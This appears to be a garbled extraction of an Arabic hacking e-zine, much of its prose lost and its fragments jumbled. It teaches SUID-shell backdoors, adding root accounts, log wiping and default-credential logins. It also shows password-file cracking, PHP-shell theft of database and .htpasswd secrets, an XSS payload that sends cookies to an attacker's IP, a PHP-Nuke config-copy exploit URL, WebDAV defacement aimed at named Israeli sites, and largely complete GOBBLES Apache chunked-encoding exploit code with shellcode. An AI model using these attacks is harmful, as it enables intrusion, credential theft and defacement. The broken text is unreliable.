=| !!!!!!
(= ...

.

..
..
-1 sushi
. sushi suid shell
. bin/sh/
. suid
:
sh-2.03$ cp /bin/sh /dev/nul


.. dev
null
= D =D
sh-2.03$ cd /dev
sh-2.03$ chown root nul
691

-:
sh-2.03$ chmod 4775 nul
4775 suid .
chmod +s nul
..
..
..
sh-2.03$ exit
80. = D
:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
=(

692

..
suid
sushi

sash A
stand-alone shell
...
suid /
bin/sh sushi
-2
/
etc/passwd

-: vi
sh-2.03$ vi /etc/passwd
. .
vi


luser:passwd:uid:gid:startdir:shell
693

uid & gid =0


:
dood::0:0:dood:/:/bin/sh
.
sh-2.03$ su dood
sh-2.03$ whoami
dood
.. dood
gid uid
-3 bindshell
bindshell
telnetd
..

.
TCP UDP
..

694




TCP
UDP
-: . .. .
..
..


Last login: Sun Sep 24 10:32:14 from <yourIPaddress>.



-:

..
695


..
=(

usr/adm/lastlog/
var/adm/lastlog/
var/log/lastlog/
. lled
..

. ...
. ftp

. wted lled
who
sh-2.03$ who
Sep 25 18:18

tty1
696

root

. zap2
: luser
sh-2.03$ ./zap2 luser
!Zap2
sh-2.03$ who
sh-2.03$
:

..
.

697

698

"
"
> <
> : <
...

.

. .


.


699

FreeServers.com

. :
.




700

.
.

.


.

.




Caller ID
...

701

notepade

Hakkerz.home.ml.org

html

@Blahblahblah
.
.

header

.
IP
Whois
702



. finger
@Finger


. scan ports
IP

Linux /Unix systems

Exploit Generator



703

. linux
21
FTP 23
TelNet
Telnet
Anonymous
. .

hakkerz.home.ml.org
telnet 23
www

telnet.Victim.com telnet
www
whois


21
ftp
704

SYST
80 http

Whats
?Running

.

.
Login: root$
Password: root$
linux

. . telnet
.


ACCOUNT: PASSWORD
705

login) root: (password) root)


sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon


.

706

whois
.
unix .
passwd

. ftp
. internet
explorer
. IP
jammer
.hakkerz.home.ml.org
.

ftp:// abc.net /ftp://ftp.abc.net
ftp
whois
\ etc
passwd

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
kangaroo .
3a62i9qr

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
708



* s ?xs

John the Ripper 1.5
.

709

710

" ) PHP Shell


( "
> < pharaonics
>> Arab VieruZ:


. ...


(:

:

:

711

PHP Shell
**-----------------------------------------------
:

**-----------------------------------------------
ls -a :

**-----------------------------------------------
cat -e : cat

**-----------------------------------------------
712

rm -f :

**-----------------------------------------------
rm -d :

**-----------------------------------------------
cp -i :

**-----------------------------------------------
mv :

713

**-----------------------------------------------
:

--
help
ls --help :
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------

714

-1
715

-2
-3
-4
-5
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
!!!


716

-1
: hacked.txt
**-----------------------------------------------
-2






**-----------------------------------------------
-3 .

717

" ) PHP Shell


( "
718

> < pharaonics


>> Arab VieruZ:

**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
PHP Shell 2

.
719

**-----------------------------------------------
-1 My SQL
config.php

PHP Shell


cat config.php

**-----------------------------------------------
-2 htpasswed.


720

htaccess.
:
/home/site/.htpasswds/forum/admin/passwd
cat /home/site/.htpasswds/forum/admin/passwd
DES

user:nymw4oS3oerdY
**-----------------------------------------------
-3
: service.pwd

DES
721

:
_vti_pvt
cat /home/site/www/_vti_pvt/service.pwd
: DeXXa
user:nymw4oS3oerdY
**-----------------------------------------------
-4 :

phpMyAdmin

config.php
722

!!

723

" ) PHP Shell


( "
> < pharaonics
>> Arab VieruZ:



**-----------------------------------
-1 :
:
home/
: /
ls -a /home
724


ls -a /home/SITE
= SITE
**-----------------------------------
-2 :
home

:
:
/home/site/public_html

725

/home/site/www

**-----------------------------------
-3


.

726

727

" " anmap


><
> : <
:
- nmap
:
-
:

728

.

.

:
UDP
()TCP connect
(TCP SYN (half open
(ftp proxy (bounceattack
Reverse-ident
(ICMP (ping sweep
FIN
ACK sweep
Xmas Tree
SYN sweep
.and Null scan
. ..:
remote OS detection via TCP/IP
fingerprinting
729

stealth scanning
dynamic delay and
retransmission calculations
parallel scanning
detection of down hosts via parallel
pings
decoy scanning port
filtering detection
direct (non-portmapper) RPC
scanning
fragmentation scanning
flexible target and port specification


.

730

)(




)(





:
. .
731

TCP sequencability



.

732

"
"
> <
><network access :
.
.

733


.


.





)
(
%50
%50


. .
. . .

734


aswind.COM
ip

INTERNIC.NET


INTERNIC.NET
:
NSLOOKUP
SET TYPE = ALL
aswind.COM
:
Domain Name: ASWIND.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.onlinenic.com/
Name Server: DNS.ASWIND.COM
Name Server: NS1.ASWIND.COM
Updated Date: 01-apr-2002
. aswind.com
. DNS = 2
2. DNS
DNS

DNS
DNS

Ip
aswind.com
6 .
IP
. DNS
DNS
. WIN2K DNS

DNS
736

DNS
.

HowIS
IP

LMHOSTS
NetBios IP

C
200.200.200.0 LMHOSTS
NetBios = N2
200.200.200.2 Net
view //servername N1
N254

1 254

.
\
737

Administrator





Windwos


.
username and password
net user



. . .


.

. . .
738

Messenger Service .
NetBios

. IP 200.200.200.200
. nbtstat -a
200.200.200.200
.
MSBROWSER )
(
John IP
200.200.200.50
Nbtstat -a 200.200.200.50
john
johnPC
. )
( Administrator

. Messenger Service
)
(
MSBROWSER
739

nbtstat -a




.


nt senstiver
)
(.



l0pthcrack .

740

741

" " Cross Site Scripting


> <
><tcp :
:
HTML
JAV
742

ASCRIPT ,PERL ,CGI ,VBSCRIPT




=============================
=============================
=============================
========

:
* .
.
* VBULLETIN
YaBB and UBB

*.

743

*
=============================
=============================
=============================
=========
:




...
...
=============================
=============================
=============================
744

=========
:

...


.

.



:
745

Hello FOLKS board. This is a message.
<SCRIPT>malicious code</SCRIPT>
This is the end of my message.
malicious code

...


HTML
<script>document.write('<img src="http://my_ip_address/'+document.cookie+'">');</script>
746


<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A>

comment.cgi



mycomment
747


. .
:
<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT SRC='http://badsite/badfile'></SCRIPT>"> Click here</A>
.
748



BADFILE

.
cross-site scripting
" " .



CSS
cross-site scripting
CASCADE style sheets

749

<SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>
<form>
HTML .

=============================
============================
:

750

http://www.cert.org/advisorie
s/CA-2000-02.html

http://www.perl.com/pub/a/20
02/02/20/css.html

" "
751

> <
> :<
,
...
, - - -
- ......


........... :
.
.
.
.
.
.
.
.
.
.
.
752

.
.

:
=============================
=====================
=
h3>put your text
--><here<xmp><plaintext
=============================
=====================

put your text


.... here ....

753

:
=====
!

" "
> <
><Dr^FunnY :
...
html


.....
754

...
"
"
"
... "HTML ...
(:
.



.

755

" "
756

> <
= Exploit =
:
.

..

:
-1

super scan
.
-2 . .
.

. .
.
www.netcraft.net
!.!!..
. ...
757

-3

-4




/....../www.thesite.com
:
*pl.


Active Perl

* c.

*sh.


www.securiteam.com
www.securityfocus.com
www.ukrt.f2s.com
758

www.ussrback.com
www.packetstorm.securify.co
m
www.secureroot.com
www.rootshell.com

.



.


..
shadowed .encryption

root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp


...
x
..
:
root:x:0:1:Super-User:/:/sbin/sh

root:Q71KBZlvYSnVw:0:1:SuperUser:/:/sbin/sh
= root .
= x

shadowed


shadow file
760

= token
Linux : /etc/shadow, token = *
SunOS : /etc/shadow, token = *
FreeBSD : /etc/master.passwd or /etc/shadow, token = * or x
IRIX : /etc/shadow, token = x
AIX : /etc/security/passwd, token = !
ConvexOS : /etc/shadow or /etc/shadpw, token = *

761

root:EpGw4GekZ1B9U:11390::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
lp:NP:6445::::::

EpGw4GekZ1B9U



John the ripper
.
.

x

:

john passwd
passwd

:
762

John the Ripper Version 1.3 Copyright (c) 1996,97 by Sola
Loaded 1 password
***** v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE



john.pot
.
.

" "
> <
>< icer :
763

. :
1
2 )
(
3 ...
4 ...

: a face at the interface


.
. ..
.
...

http ..
. scanner
....
BOF (buffer over flow) , DoS ( denial
, (of service
. DoS
...
764



....

DoS
.
. DoS GET /
POST
OVERLOAD
)
24 (
.... OFFLINE

..
. ..
765




. ..

threads
cgi scaners

..
...
<<< shadow security scaner
.....
rootshell.com


red hat 7.2

...... red hat 7.2

766


2
)
( shadow
..
...
url
.. ..
url
rootshell.com

%99
..
.......

3 :
767


..
..
commands ..


, http BOF
..
..

....

config.inc

... DES/MD5 /
.... etc/passwd ...
.
DoS
. DoS

768

...
..

4 :

:
packetstorm.securify.com
/.securityfocus.com
/www.insecure.org
/www.rootshell.com
.(:

769

" "
><
><oOoDa BE$T :
:
txt. :
..

770

,..
..
c. :
..
..
)_ (compile
)(_ .
...
.. Linux
.. Shell Account

:
>---- gcc filenmae.c
:
>--- a.out ..


..
:
771

a.out xxx.xxx.xxx.xxx/.
:
pl. :
Linux ..
Shell Account
: exploit
perl filename.pl xxx.xxx.xxx.xxx

filename xxx.xxx.xxx.xxx/.

772

"
"
> .<
><DeadLine :
:
:
Microsoft-IIS/5.0 on Windows 2000

98
.
98 :
Web Folders :
:
:
773

My Computer

My Computer

Web Folders
:
Add Web Folder

: Add Web Folder
Type the location to add
. :
/http://hostname.com
hostname

774




:
mail.talcar.co.il
daihatsu-israel.co.il
daewoo-israel.co.il

:
/http://192.117.143.121
Next :


:
finish
Web Folder :
775


:
http://www.israwine.co.il/
212.199.43.84
:



.

776

777

" "

<>
>Arab VireruZ :>
:
twlc: here your 0day from LucisFero
and supergate
Posted on Monday, September 24 @
14:25:58 CDT
topic: advisories
twlc security divison
24/09/2001
.Php nuke BUGGED
:Found by
LucisFero and supergate
778

twlc/.
Summary
This time the bug is really
dangerous...it allows you to 'cp' any
file on the box... or even upload
...files
Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a
released c. is ok while the final 5.2
(is bugged
Explanation
?Do you need sql password
http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
779

the admin 'login' page will be


prompted just go to
http://www.server.net/images/hacke
d.txt and you will see config.php
that as everyone knows contain the
sql's passwords, you can even
upload files...i leave you the 'fun' to
find all the ways to use it... and try
to dont be a SCRIPT KIDDIE we
wrote this advisory to help who
runs php nuke and NOT TO LET
.YOU HAVE FUN
let me explain you the bug...
:admin.php contains this routine
$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
    copy($userfile,$basedir.$wdir.$userfile_name);
    $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
    // This need a rewrite -------------------------------------> OMG! WE TOTALY AGREEEEEEEE lmao
    //include("header.php");
    //GraphicAdmin($hlpfile);
    //html_header();
    //displaydir();
    $wdir2="/";
    chdir($basedir . $wdir2);
    //CloseTable();
    //include("footer.php");
    Header("Location: admin.php?op=FileManager");
    exit;
}
781

that doesnt do a check to see if you


are logged as admin or no... so you
...can use it anyway
Solution
we erased the function... cause we
wanted to remove the file manager
anyway but i suggest you to do the
-same... -to upload files use FTP
:conclusions
yet another bug of php nuke... this
software is used by thousands of
people... (we run something based
on it too) i hope that this time the
author will reply soon and will
release a patch too! as i said before
just dont try to be a script kiddie or
we simply WONT post anymore this
kind of advisories. Prolly the funny
thing is that who first discovered
the bug was LucisFero that... 2
782

hours before didnt knew php ... so i


(supergate) fear him and you should
.too
:posted at
http://www.twlc.net article
http://www.twlc.net/article.php?
sid=421
bugtraq@securityfocus.com
-http://www.phpnuke.org -good luck
http://sourceforge.net/tracker/?
group_id=7511 Project: PHP-Nuke
Web Portal System
and of course mailed to the author
of php nuke
contacts (bugs, ideas, insults, cool
girls... remember that trojans are
:(directed to /dev/null
lucisfero@twlc.net
supergate@twlc.net
783

http://www.twlc.net (yes we are


(patched
.peace out pimps. bella a tutti
eof
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:
$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
    copy($userfile,$basedir.$wdir.$userfile_name);
    $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
    // This need a rewrite -------------------------------------> OMG! WE TOTALY AGREEEEEEEE lmao
    //include("header.php");
    //GraphicAdmin($hlpfile);
    //html_header();
    //displaydir();
    $wdir2="/";
    chdir($basedir . $wdir2);
    //CloseTable();
    //include("footer.php");
    Header("Location: admin.php?op=FileManager");
    exit;
}
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:
785

http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=

http://www.server.net/admin.php?upload=1&file=config.php&file_name=ultramode.txt&wdir=/&userfile=config.php&userfile_name=ultramode.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:
786

= config.php ultramode.txt


(-:

http://server.com/ultramode.txt
=-

-1 server.com
-2 :
http://server.com/nuke
-3 5.2
.

787

788

" " Chunked

> <angels-bytes
Chunked Apache
. angels-bytes
Retina
Apache Chunked Scanner
. 254
.


789

2.0.39

http://www.apache.org/dist/httpd/bi
naries

1.3.24 2 2
dev-2.0.36



))*/ angels-
bytes.com ((
790

/*
/** /
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#

define EXPLOIT_TIMEOUT 5 /* num#


seconds to wait before assuming it
/* failed
define RET_ADDR_INC 512#

define#
791

MEMCPY_s1_OWADDR_DELTA
-146
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#

define REP_POPULATOR 24#


define REP_RET_ADDR 6#
define REP_ZERO 36#
define REP_SHELLCODE 24#
define NOPCOUNT 1024#
define NOP 0x41#
'\\define PADDING_1 \\'A#
'\\define PADDING_2 \\'B#
'\\define PADDING_3 \\'C#
define PUT_STRING(s) memcpy(p,#
;(s, strlen(s)); p += strlen(s
define PUT_BYTES(n, b)#
;memset(p, b, n); p += n
792

define#
SHELLCODE_LOCALPORT_OFF 30
= []char shellcode
\\\\ "\\\
x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x
\10
\\\
x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\x
\\b8
"\\\x1f\\
\\\\ "\\\
x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x
\7a
\\\
x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x
\\7a
"\\\x02\\
\\\\ "\\\
x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x
\90
793

\\\
xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x
\\24
"\\\x04\\
\\\\ "\\\
x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\x
\c7
\\\
x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x
\\00
"\\\xb8\\
\\\\ "\\\
x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x
\ff
\\\
x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x
\\08
"\\\x03\\
\\\\ "\\\
x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x
\0b
\\\
794

x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x
\\01
"\\\x89\\
\\\\ "\\\
xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x
\6a
\\\
x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\x
\\cd
"\\\x80\\
\\\\ "\\\
x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x
\2f
\\\
x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\x
\\c0
"\\\x50\\
\\\\ "\\\
x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x
\50
\\\
xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\
795

\\x80
;"\\\xcc\\

} struct
;char *type
;u_long retaddr
targets[] = { // hehe, yes theo, that {
!say OpenBSD here
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.20\\\", 0xcf92f
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.22\\\", 0x8f0aa
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.24\\\", 0x90600
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.20\\\", 0x8f2a6
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.23\\\", 0x90600
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.24\\\", 0x9011a
OpenBSD 3.1 x86 / Apache"\\\ }
796

,{ 1.3.24 #2\\\", 0x932ae


;{

} ([]int main(int argc, char *argv


;char *hostp, *portp
;unsigned char buf[512], *expbuf, *p
;int i, j, lport
;int sock
;int bruteforce, owned, progress
;u_long retaddr
;struct sockaddr_in sin, from

} (if(argc != 3
;([printf(\\\"Usage: %s \\\\n\\\", argv[0
printf(\\\" Using targets:\\\\t./apache;("\\\scalp 3 127.0.0.1:8080\\\\n
printf(\\\" Using
bruteforce:\\\\t./apache-scalp
;("\\\0x8f000 127.0.0.1:8080\\\\n
797

printf(\\\"\\\\n--- --- - Potential targets


;("\\\list - --- ----\\\\n
printf(\\\"Target ID / Target
;("\\\specification\\\\n
(++for(i = 0; i < sizeof(targets)/8; i
printf(\\\"\\\\t%d / %s\\\\n\\\", i,
;(targets[i].type
;return -1
{

;("\\\:"\\\ ,[hostp = strtok(argv[2


if((portp = strtok(NULL, \\\":\\\")) ==
(NULL
;"\\\portp = \\\"80
;(retaddr = strtoul(argv[1], NULL, 16
} (if(retaddr < sizeof(targets)/8
;retaddr = targets[retaddr].retaddr
;bruteforce = 0
{
798

else
;bruteforce = 1

;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
for(owned = 0, progress = 0;;retaddr
} (+= RET_ADDR_INC
        /* skip invalid return addresses */
        i = retaddr & 0xff;
        if(i == 0x0a || i == 0x0d)
            retaddr++;
        else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
            continue;

        sock = socket(AF_INET, SOCK_STREAM, 0);
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(hostp);
        sin.sin_port = htons(atoi(portp));
        if(!progress)
            printf("\n[*] Connecting.. ");
        fflush(stdout);
        if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
            perror("connect()");
            exit(1);
        }
        if(!progress)
            printf("connected!\n");

        /* Setup the local port in our shellcode */
        i = sizeof(from);
        if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {
            perror("getsockname()");
            exit(1);
        }
        lport = ntohs(from.sin_port);
        shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
        shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;

        p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
                            + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR));
        PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n");
        for (i = 0; i < REP_SHELLCODE; i++) {
            PUT_STRING("X-");
            PUT_BYTES(PADSIZE_3, PADDING_3);
            PUT_STRING(": ");
            PUT_BYTES(NOPCOUNT, NOP);
            memcpy(p, shellcode, sizeof(shellcode) - 1);
            p += sizeof(shellcode) - 1;
            PUT_STRING("\r\n");
        }
        for (i = 0; i < REP_POPULATOR; i++) {
            PUT_STRING("X-");
            PUT_BYTES(PADSIZE_1, PADDING_1);
            PUT_STRING(": ");
            for (j = 0; j < REP_RET_ADDR; j++) {
                *p++ = retaddr & 0xff;
                *p++ = (retaddr >> 8) & 0xff;
                *p++ = (retaddr >> 16) & 0xff;
                *p++ = (retaddr >> 24) & 0xff;
            }
            PUT_BYTES(REP_ZERO, 0);
            PUT_STRING("\r\n");
        }
        PUT_STRING("Transfer-Encoding: chunked\r\n");
        snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
        PUT_STRING(buf);
        PUT_BYTES(PADSIZE_2, PADDING_2);
        snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", MEMCPY_s1_OWADDR_DELTA);
        PUT_STRING(buf);
        write(sock, expbuf, p - expbuf);

        progress++;
        if((progress%70) == 0)
            progress = 1;
        if(progress == 1) {
            memset(buf, 0, sizeof(buf));
            sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u",
                    retaddr, (unsigned int)(p - expbuf), lport);
            memset(buf + strlen(buf), ' ', 74 - strlen(buf));
            puts(buf);
            if(bruteforce)
                putchar(';');
        }
        else
            putchar((rand()%2)? 'P': 'p');

        fflush(stdout);

        while (1) {
            fd_set fds;
            int n;
            struct timeval tv;
            tv.tv_sec = EXPLOIT_TIMEOUT;
            tv.tv_usec = 0;
            FD_ZERO(&fds);
            FD_SET(0, &fds);
            FD_SET(sock, &fds);
            memset(buf, 0, sizeof(buf));
            if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
                if(FD_ISSET(sock, &fds)) {
                    if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
                        break;
                    if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) {
                        printf("\nGOBBLE GOBBLE!@#%%)*#\n");
                        printf("retaddr 0x%lx did the trick!\n", retaddr);
                        sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n");
                        write(sock, expbuf, strlen(expbuf));
                        owned++;
                    }
                    write(1, buf, n);
                }
                if(FD_ISSET(0, &fds)) {
                    if((n = read(0, buf, sizeof(buf) - 1)) < 0)
                        exit(1);
                    write(sock, buf, n);
                }
            }
            if(!owned)
                break;
        }
        free(expbuf);
        close(sock);
        if(owned)
            return 0;
        if(!bruteforce) {
            fprintf(stderr, "Ooops.. hehehe!\n");
            return -1;
        }
    }
    return 0;
}

Exploit #2:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#ifdef __linux__
#include <getopt.h>
#endif

#define HOST_PARAM "apache-nosejob.c" /* The Host: field */
#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, now use another bug/backdoor/feature (hi Theo!) to gain instant r00t';\n"
#define RET_ADDR_INC 512

#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7

#define REP_POPULATOR 24
#define REP_SHELLCODE 24
#define NOPCOUNT 1024
#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;

/* The shellcode byte string printed in the original listing is not reproduced
   here; an empty string keeps the rest of the file compiling. */
char shellcode[] = "";

struct {
    char *type;       /* description for newbie penetrator */
    int delta;        /* delta thingie! */
    u_long retaddr;   /* return address */
    int repretaddr;   /* we repeat retaddr thiz many times in the buffer */
    int repzero;      /* and \0'z this many times */
} targets[] = { // hehe, yes theo, that say OpenBSD here!
    { "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)", -150, 0x80f3a00, 6, 36 },
    { "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)", -150, 0x80a7975, 6, 36 },
    { "OpenBSD 3.0 x86 / Apache 1.3.20", -146, 0xcfa00, 6, 36 },
    { "OpenBSD 3.0 x86 / Apache 1.3.22", -146, 0x8f0aa, 6, 36 },
    { "OpenBSD 3.0 x86 / Apache 1.3.24", -146, 0x90600, 6, 36 },
    { "OpenBSD 3.0 x86 / Apache 1.3.24 #2", -146, 0x98a00, 6, 36 },
    { "OpenBSD 3.1 x86 / Apache 1.3.20", -146, 0x8f2a6, 6, 36 },
    { "OpenBSD 3.1 x86 / Apache 1.3.23", -146, 0x90600, 6, 36 },
    { "OpenBSD 3.1 x86 / Apache 1.3.24", -146, 0x9011a, 6, 36 },
    { "OpenBSD 3.1 x86 / Apache 1.3.24 #2", -146, 0x932ae, 6, 36 },
    { "OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1", -146, 0x1d7a00, 6, 36 },
    { "NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)", -90, 0x80eda00, 5, 42 },
    { "NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)", -90, 0x80efa00, 5, 42 },
    { "NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)", -90, 0x80efa00, 5, 42 },
    { "NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)", -90, 0x80efa00, 5, 42 },
    { "NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)", -90, 0x80efa00, 5, 42 },
}, victim;

void usage(void) {
    int i;
    printf("GOBBLES Security Labs\t\t\t\t\t- apache-nosejob.c\n\n");
    printf("Usage: ./apache-nosejob <switches> -h host[:80]\n");
    printf(" -h host[:port]\tHost to penetrate\n");
    printf(" -t #\t\t\tTarget id.\n");
    printf(" Bruteforcing options (all required, unless -o is used!):\n");
    printf(" -o char\t\tDefault values for the following OSes\n");
    printf(" \t\t\t(f)reebsd, (o)penbsd, (n)etbsd\n");
    printf(" -b 0x12345678\t\tBase address used for bruteforce\n");
    printf(" \t\t\tTry 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.\n");
    printf(" -d -nnn\t\tmemcpy() delta between s1 and addr to overwrite\n");
    printf(" \t\t\tTry -146/obsd, -150/fbsd, -90/nbsd.\n");
    printf(" -z #\t\t\tNumbers of time to repeat \\0 in the buffer\n");
    printf(" \t\t\tTry 36 for openbsd/freebsd and 42 for netbsd\n");
    printf(" -r #\t\t\tNumber of times to repeat retadd in the buffer\n");
    printf(" \t\t\tTry 6 for openbsd/freebsd and 5 for netbsd\n");
    printf(" Optional stuff:\n");
    printf(" -w #\t\t\tMaximum number of seconds to wait for shellcode reply\n");
    printf(" -c cmdz\t\tCommands to execute when our shellcode replies\n");
    printf(" \t\t\taka auto0wncmdz\n");
    printf("\nExamples will be published in upcoming apache-scalp-HOWTO.pdf\n");
    printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n");
    printf(" ID / Return addr / Target specification\n");
    for(i = 0; i < sizeof(targets)/sizeof(victim); i++)
        printf("% 3d / 0x%.8lx / %s\n", i, targets[i].retaddr, targets[i].type);
    exit(1);
}

int main(int argc, char *argv[]) {
    char *hostp, *portp, *cmdz = DEFAULT_CMDZ;
    u_char buf[512], *expbuf, *p;
    int i, j, lport, sock;
    int bruteforce, owned, progress, sc_timeout = 5;
    int responses, shown_length = 0;
    struct in_addr ia;
    struct sockaddr_in sin, from;
    struct hostent *he;

    if(argc < 4)
        usage();
    bruteforce = 0;
    memset(&victim, 0, sizeof(victim));
    while((i = getopt(argc, argv, "t:b:d:h:w:c:r:z:o:")) != -1) {
        switch(i) {
            /* required stuff */
            case 'h':
                hostp = strtok(optarg, ":");
                if((portp = strtok(NULL, ":")) == NULL)
                    portp = "80";
                break;
            /* predefined targets */
            case 't':
                if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {
                    printf("Invalid target\n");
                    return -1;
                }
                memcpy(&victim, &targets[atoi(optarg)], sizeof(victim));
                break;
            /* bruteforce! */
            case 'b':
                bruteforce++;
                victim.type = "Custom target";
                victim.retaddr = strtoul(optarg, NULL, 16);
                printf("Using 0x%lx as the baseadress while bruteforcing..\n", victim.retaddr);
                break;
            case 'd':
                victim.delta = atoi(optarg);
                printf("Using %d as delta\n", victim.delta);
                break;
            case 'r':
                victim.repretaddr = atoi(optarg);
                printf("Repeating the return address %d times\n", victim.repretaddr);
                break;
            case 'z':
